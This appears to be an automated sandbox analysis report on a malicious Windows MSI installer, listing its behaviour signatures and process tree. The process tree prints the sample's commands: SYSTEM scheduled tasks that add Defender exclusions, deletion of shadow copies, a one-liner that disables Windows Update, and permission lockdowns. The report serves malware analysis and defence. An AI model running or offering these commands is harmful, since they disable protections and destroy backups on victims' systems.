Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    04/08/2026, 04:42

General

  • Target
    setup_n0c011.msi
  • Size 6.3MB
  • Sample260804-fb1fradb26
  • SHA256 a6f7ed297b0ae9d065644307ff5686d634fbe529186a7a7cbd10b00746a1ae68
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 6 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 30 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 56 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup_n0c011.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1956
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4948
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 0D22F03E75EC00C8EB5081897AED2434 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:2008
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:1160
  • C:\Users\Public\1FJnRi\C7pnKJ.exe
    C:\Users\Public\1FJnRi\C7pnKJ.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\1FJnRi\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\1FJnRi\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3400
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:2148
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:3992
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:2500
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3708
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3264
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:392
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3332
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1644
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4092
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1176
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4692
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4996
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:2880
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:4668
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:1592
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4972
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:1564
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:3692
                        • C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe
                          "C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:3384
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1300
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3708
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Hds6Xa" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:824
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4228
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:5032
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2624
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2636
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:5012
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:3596
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4368
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure wuauserv reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2380
                            • C:\Windows\SysWOW64\net.exe
                              net stop UsoSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:968
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop UsoSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:3400
                            • C:\Windows\SysWOW64\sc.exe
                              sc config UsoSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              PID:2420
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure UsoSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              PID:4792
                            • C:\Windows\SysWOW64\net.exe
                              net stop uhssvc
                              4⤵
                                PID:1008
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop uhssvc
                                  5⤵
                                    PID:4560
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config uhssvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:5092
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure uhssvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  PID:4508
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WaaSMedicSvc
                                  4⤵
                                    PID:1156
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop WaaSMedicSvc
                                      5⤵
                                        PID:3992
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config WaaSMedicSvc start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:4780
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure WaaSMedicSvc reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      PID:4568
                                    • C:\Windows\SysWOW64\takeown.exe
                                      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:1700
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:4492
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:3032
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:4384
                                    • C:\Windows\SysWOW64\takeown.exe
                                      takeown /f C:\Windows\System32\wuaueng.dll
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:2980
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:4552
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:2744
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:176
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                      4⤵
                                        PID:5116
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                        4⤵
                                          PID:4960
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                          4⤵
                                            PID:2316
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            PID:5032
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\Hds6Xa\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:1324
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\Hds6Xa\" /t REG_DWORD /d 0 /f"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4632
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Run /TN "Task1"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4124
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3768
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c echo.>c:\xxxx.ini
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          PID:2404
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:4304
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:2412
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:3776
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3784
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Run /TN "Task1"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4156
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4216
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:3480
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:5016
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe" /inheritance:r
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:1056
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe" /inheritance:r
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:4948
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:3192
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4324
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Run /TN "Task1"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3320
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:976
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:3924
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:1696
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe" /grant:r Users:(RX) /deny Users:(DE)
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:624
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\Hds6Xa.exe" /grant:r Users:(RX) /deny Users:(DE)
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:1584
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\image.png" /inheritance:r
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:3116
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\image.png" /inheritance:r
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:1176
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\Hds6Xa\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:2964
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\Hds6Xa\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                            4⤵
